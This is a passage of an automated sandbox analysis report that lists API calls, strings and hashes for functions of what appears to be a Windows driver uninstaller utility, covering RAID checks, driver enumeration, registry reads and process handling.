                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatInitializeLocalMutexObjectOutputReleaseSingleStringWait_fprintf_sprintf
                                  • String ID: CheckRAID: invalid number of arguments$FALSE$NVRAID_ARRAY_DEVICE$RAID is enabled$RAID not enabled (failed to connect to ROOT\WMI)$RAID not enabled (failed to get array device enumerator)$TRUE$UninstCommandClass::CheckRAID$UninstCommandClass::CheckRAID - Failed to initialize COM
                                  • API String ID: 1053487729-914542017
                                  • Opcode ID: f09f7904738a1945c1226c3e4085f644212955ce82d1d8d4ab6adc370d376232
                                  • Instruction ID: 29c6eacce0db0b0e3343b95ef391c25fa63cf2e37afda36465b898a1b3433f28
                                  • Opcode Fuzzy Hash: f09f7904738a1945c1226c3e4085f644212955ce82d1d8d4ab6adc370d376232
                                  • Instruction Fuzzy Hash: A7210A763042006BD214BA67ED42E9F7649AFA4718B14443FF809A32C2DA7DA89181DE
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _memset.LIBCMT ref: 00409BFB
                                  • SetupDiSetDeviceInstallParamsA.SETUPAPI ref: 00409C16
                                  • SetupDiBuildDriverInfoList.SETUPAPI(?,?,00000001), ref: 00409C26
                                  • _memset.LIBCMT ref: 00409C4F
                                  • SetupDiEnumDriverInfoA.SETUPAPI ref: 00409C77
                                  • SetupDiDestroyDriverInfoList.SETUPAPI(?,?,00000001), ref: 00409D27
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  • _memset.LIBCMT ref: 00409CAE
                                  • SetupDiGetDriverInfoDetailA.SETUPAPI ref: 00409CDE
                                    • Part of subcall function 004092E0: SetupDiSetSelectedDevice.SETUPAPI(?,?), ref: 0040932D
                                    • Part of subcall function 004092E0: _memset.LIBCMT ref: 0040934A
                                    • Part of subcall function 004092E0: SetupDiSetDeviceInstallParamsA.SETUPAPI(?,?,00000128), ref: 00409389
                                    • Part of subcall function 004092E0: SetupDiCallClassInstaller.SETUPAPI(00000016,?,?), ref: 00409397
                                    • Part of subcall function 004092E0: SetupDiBuildDriverInfoList.SETUPAPI(?,?,00000002), ref: 004093A5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Setup$DriverInfo$_memset$DeviceList$BuildInstallParamsTime_fputs$CallClassDebugDestroyDetailEnumFormatInstallerLocalMutexObjectOutputReleaseSelectedSingleStringWait__mbsicmp_l_fprintf
                                  • String ID: Microsoft$UninstCommandClass::InstallITBDriver
                                  • API String ID: 1981627633-369273916
                                  • Opcode ID: 57a4cffe7a14b867e8932c976c21d90d98cc9c28e645a329069c4cbb35faba21
                                  • Instruction ID: 79902e13d2512c74ec99e1bc91030035d56514d2eb5624bf92bfa92e69f4fdc4
                                  • Opcode Fuzzy Hash: 57a4cffe7a14b867e8932c976c21d90d98cc9c28e645a329069c4cbb35faba21
                                  • Instruction Fuzzy Hash: EC4188B2548304ABD320DF54DC45FEBB3ECEB98704F40492DB649961C1DBB9A908CB9A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf
                                  • String ID: Current Component$NVU File$UninstCommandClass::UninstallGUI$Vh<A${NVCompList_RegKey}${sysdir}\*.nvu
                                  • API String ID: 3853344119-626721777
                                  • Opcode ID: 2c107cd7f6229a9a2880bb8b91567bd054758acad2a109100cbbda8435f40b5d
                                  • Instruction ID: 6a827f7e21cefda99957e67ed3f360bc3c4821829fd0d0c8ba9c95c4a33da572
                                  • Opcode Fuzzy Hash: 2c107cd7f6229a9a2880bb8b91567bd054758acad2a109100cbbda8435f40b5d
                                  • Instruction Fuzzy Hash: 4C31A7706447006BD610AB269C42F6FB6D9EBC4B04F10083FF956B72C2DB79AD45869E
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • LoadImageA.USER32(00000000,?,00000000,00000000,00000000,00002050), ref: 00402C33
                                    • Part of subcall function 00401820: _sprintf.LIBCMT ref: 0040186E
                                  Strings
                                  • CommandClass::Splash, xrefs: 00402BE2
                                  • Slplash: invalid number of arguments, xrefs: 00402C08
                                  • STATIC, xrefs: 00402C90
                                  • Slplash: Failed to load bitmap %s, xrefs: 00402C46
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatImageLoadLocalMutexObjectOutputReleaseSingleStringWait_fprintf_sprintf
                                  • String ID: CommandClass::Splash$STATIC$Slplash: Failed to load bitmap %s$Slplash: invalid number of arguments
                                  • API String ID: 673139762-2071465357
                                  • Opcode ID: 43cb4329e765b79063321ee9de9802ab41771304c365274229d331a9d47fc198
                                  • Instruction ID: e18f303b0d91d8b11d077f509afa21f711458ed26a76a8ff31a7a342f34f5afb
                                  • Opcode Fuzzy Hash: 43cb4329e765b79063321ee9de9802ab41771304c365274229d331a9d47fc198
                                  • Instruction Fuzzy Hash: AC21D7B23803047BF22066719C4AFAB7659DB95B15F10443EF711B51D1DAB8585182ED
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetParent.USER32 ref: 00407231
                                  • GetDesktopWindow.USER32 ref: 0040723B
                                  • GetWindowRect.USER32(00000000,?), ref: 0040724E
                                  • GetWindowRect.USER32(?,?), ref: 00407256
                                  • CopyRect.USER32(?,?), ref: 00407262
                                  • OffsetRect.USER32(?,?,?), ref: 00407281
                                  • OffsetRect.USER32(?,?,?), ref: 00407296
                                  • OffsetRect.USER32(?,?,?), ref: 004072AB
                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000001,?,?), ref: 004072D2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Rect$Window$Offset$Time_fputs$CopyDebugDesktopFormatLocalMutexObjectOutputParentReleaseSingleStringWait_fprintf
                                  • String ID: CenterDialog
                                  • API String ID: 937410608-2042424312
                                  • Opcode ID: ab50e3b9249b7b71b8e6dce0a44cfa9ebf21806dcded3e587ac7bcc2f1117c04
                                  • Instruction ID: d7e27fc64b9759a82f7c15c76f301883fe23e8ceee5c39425276940a113b12ce
                                  • Opcode Fuzzy Hash: ab50e3b9249b7b71b8e6dce0a44cfa9ebf21806dcded3e587ac7bcc2f1117c04
                                  • Instruction Fuzzy Hash: 2F2160B6514306AFD300DB68CD81EBBB7ECEBC8700F048A1DB995D3290D774E9058BA6
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _memset.LIBCMT ref: 004019AC
                                  • CreateProcessA.KERNEL32 ref: 004019E1
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004019F2
                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401A02
                                  • CloseHandle.KERNEL32(?), ref: 00401A13
                                  • CloseHandle.KERNEL32(?), ref: 00401A1A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CloseHandleObjectProcessSingleTimeWait_fputs$CodeCreateDebugExitFormatLocalMutexOutputReleaseString_fprintf_memset
                                  • String ID: CommandClass::RunAndWait(%s)$D$Failed to create process$Process terminated
                                  • API String ID: 3694129204-3215276449
                                  • Opcode ID: c4300a1d48f8192342c91c1721271c664df57e9e2a645f4329b5477ab53ea336
                                  • Instruction ID: e9eeae8e62daf794104d350443afa2b02372016967a382820a11fe24c0cb3616
                                  • Opcode Fuzzy Hash: c4300a1d48f8192342c91c1721271c664df57e9e2a645f4329b5477ab53ea336
                                  • Instruction Fuzzy Hash: 421133F59043007FD600EBA5CC45F9B7BECEB98714F00892EB659D3280EB74D9048BAA
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetModuleFileNameA.KERNEL32(?,?,00000080), ref: 00401F47
                                  • _sprintf.LIBCMT ref: 00401F90
                                  • _sprintf.LIBCMT ref: 00402026
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  • _sprintf.LIBCMT ref: 00401FF2
                                  Strings
                                  • %s version %i.%i.%i.%iSyntax: %s %s {%s}Description: %s, xrefs: 00401FEC
                                  • % -16.16s, xrefs: 00401FC1
                                  • CommandClass::Help, xrefs: 00401F25
                                  • % -16.16s, xrefs: 00402019
                                  • %s version %i.%i.%i.%iUsage: %s <Command>Available Commands are:, xrefs: 00401F8A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: _sprintf$Time_fputs$DebugFileFormatLocalModuleMutexNameObjectOutputReleaseSingleStringWait__mbsicmp_l_fprintf
                                  • String ID: % -16.16s$% -16.16s$%s version %i.%i.%i.%iSyntax: %s %s {%s}Description: %s$%s version %i.%i.%i.%iUsage: %s <Command>Available Commands are:$CommandClass::Help
                                  • API String ID: 1624269812-146118822
                                  • Opcode ID: f944799bb714b71bd2711589acc1117374258f261e431de1edc069fc91496fc4
                                  • Instruction ID: 879513bddeceda4965789a60416288beacbe24351dbb1b0ee1c4ef5772ffc916
                                  • Opcode Fuzzy Hash: f944799bb714b71bd2711589acc1117374258f261e431de1edc069fc91496fc4
                                  • Instruction Fuzzy Hash: 8C51E371600305ABD720DF24CC55FE773A9EF88704F14492EF959AB2C2E779A904C799
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 00406FCD
                                  • SendMessageA.USER32(?,00001036,00000000,00000004), ref: 00406FD8
                                  • GetClientRect.USER32(?,?), ref: 00406FE0
                                  • GetSystemMetrics.USER32 ref: 00406FF4
                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00407018
                                  • SendMessageA.USER32(?,00001051,?,Function_00006EE0), ref: 0040705C
                                  • SendMessageA.USER32 ref: 0040707B
                                  Strings
                                  • UninstCommandClass::BuildUninstComponentList, xrefs: 00406FA7
                                  • {sysdir}\*.nvu, xrefs: 0040702B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: MessageSend$Time_fputs$ClientDebugFormatLocalMetricsMutexObjectOutputRectReleaseSingleStringSystemWait_fprintf
                                  • String ID: UninstCommandClass::BuildUninstComponentList${sysdir}\*.nvu
                                  • API String ID: 4273050830-52341307
                                  • Opcode ID: c6d35ac2661312c77cfbf154fda682e7d82c1312f619550bf8f10ee11d0bf7a9
                                  • Instruction ID: 57d7a9d9dad677a18fac7781d06c8ef962532908ef1943b4af12a8cfaeb24461
                                  • Opcode Fuzzy Hash: c6d35ac2661312c77cfbf154fda682e7d82c1312f619550bf8f10ee11d0bf7a9
                                  • Instruction Fuzzy Hash: F22129B12043083AE310AB259C85EEF7B9CEF84768F10053EFA55621C1C6B999448AEA
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000001,?), ref: 00406A17
                                  • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 00406A4F
                                  • _memset.LIBCMT ref: 00406ABA
                                  • _memset.LIBCMT ref: 00406AC7
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000,?), ref: 00406AE8
                                  • RegCloseKey.ADVAPI32(?), ref: 00406B1F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs_memset$CloseDebugEnumFormatInfoLocalMutexObjectOpenOutputQueryReleaseSingleStringValueWait_fprintf
                                  • String ID: Current Reg Key$UninstCommandClass::EnumRegNames
                                  • API String ID: 1581692125-3565483910
                                  • Opcode ID: 4e56f3e8f9213aeeeb81587985ac65e00c95f4601a4d32b169df9d420c8c7fa2
                                  • Instruction ID: 9f431f05003dba35604fff47c1eb3f8f2c39aaf79875c877634485aa0a81bc12
                                  • Opcode Fuzzy Hash: 4e56f3e8f9213aeeeb81587985ac65e00c95f4601a4d32b169df9d420c8c7fa2
                                  • Instruction Fuzzy Hash: 38416271658300ABE310DF55DC85FABB7E8EBC8744F00492EF545A6280D778E948CBAA
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _memset.LIBCMT ref: 0040781E
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040782A
                                  • Process32First.KERNEL32 ref: 00407848
                                  • _memset.LIBCMT ref: 0040786B
                                    • Part of subcall function 00407730: _memset.LIBCMT ref: 00407769
                                    • Part of subcall function 00407730: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 0040777B
                                  • Process32Next.KERNEL32(00000000,?), ref: 004078B8
